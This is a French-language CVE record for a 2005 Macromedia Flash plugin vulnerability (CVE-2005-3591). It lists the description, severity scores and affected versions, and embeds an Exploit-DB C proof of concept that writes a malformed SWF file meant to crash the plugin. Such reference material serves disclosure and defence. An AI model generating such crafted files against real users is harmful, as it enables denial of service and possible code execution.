CVE-2005-3591 : Détail

CVE-2005-3591

A03-Injection
79.15%V3
Network
2005-11-16
06h37 +00:00
2017-07-10
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Macromedia Flash plugin (1) Flash.ocx 7.0.19.0 (Windows) and earlier and (2) libflashplayer.so before 7.0.25.0 (Unix) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via parameters to the ActionDefineFunction ActionScript call in a SWF file, which causes an improper memory access condition, a different vulnerability than CVE-2005-2628.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 1331

Date de publication : 2005-11-17 23h00 +00:00
Auteur : BassReFLeX
EDB Vérifié : Yes

/* * ********************************************************* * * Macromedia Flash Plugin - Buffer Overflow in flash.ocx * * ********************************************************* * * Version: v7.0.19.0 * * PoC coded by: BassReFLeX * * Date: 11 Oct 2005 * * ********************************************************* * */ #include <stdio.h> #include <stdlib.h> #include <string.h> void usage(char* file); /* <swf> ... </swf> */ char SWF[] = "<swf>"; char SWF_[] = "</swf>"; //[SetBackgroundColor] char SetBackgroundColor[] = "\x43\x02\xff\x00\x00"; //[DoAction] 1 pwn j00r 455! char DoAction[] = "\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00" "\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43" "\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45" "\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00"; //[ShowFrame] char ShowFrame[] = "\x40\x00"; //[End] char End[] = "\x00\x00"; int main(int argc,char* argv[]) { system("cls"); printf("\n* ********************************************************* *"); printf("\n* Macromedia Flash Plugin - Buffer Overflow in flash.ocx *"); printf("\n* ********************************************************* *"); printf("\n* Version: v7.0.19.0 *"); printf("\n* Date: 11 Oct 2005 *"); printf("\n* ProofOfConcept(POC) coded by: BassReFLeX *"); printf("\n* ********************************************************* *"); if ( argc!=2 ) { usage(argv[0]); } FILE *f; f = fopen(argv[1],"w"); if ( !f ) { printf("\nFile couldn't open!"); exit(1); } printf("\n\nWriting crafted .swf file . . ."); fwrite(SWF,1,sizeof(SWF),f); fwrite("\n",1,1,f); fwrite(SetBackgroundColor,1,sizeof(SetBackgroundColor),f); fwrite("\n",1,1,f); fwrite(DoAction,1,sizeof(DoAction),f); fwrite("\n",1,1,f); fwrite(ShowFrame,1,sizeof(ShowFrame),f); fwrite("\n",1,1,f); fwrite(End,1,sizeof(End),f); fwrite("\n",1,1,f); fwrite(SWF_,1,sizeof(SWF_),f); printf("\nFile created successfully!"); printf("\nFilename: %s",argv[1]); return 0; } void usage(char* file) { printf("\n\n"); printf("\n%s <Filename>",file); printf("\n\nFilename = .swf crafted file. Eg: overflow.swf"); exit(1); } // milw0rm.com [2005-11-18]

Products Mentioned

Configuraton 0

Macromedia>>Flash_player >> Version 6.0

Macromedia>>Flash_player >> Version 6.0.29.0

Macromedia>>Flash_player >> Version 6.0.40.0

Macromedia>>Flash_player >> Version 6.0.47.0

Macromedia>>Flash_player >> Version 6.0.65.0

Macromedia>>Flash_player >> Version 6.0.79.0

Macromedia>>Flash_player >> Version 7.0.19.0

Macromedia>>Flash_player >> Version 7.0_r19

Références

http://secunia.com/advisories/17738/
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/17626/
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2005/2317
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/15334
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=bugtraq&m=113140426614670&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://secunia.com/advisories/17481/
Tags : third-party-advisory, x_refsource_SECUNIA
http://securityreason.com/securityalert/149
Tags : third-party-advisory, x_refsource_SREASON
http://secunia.com/advisories/17430/
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/17437/
Tags : third-party-advisory, x_refsource_SECUNIA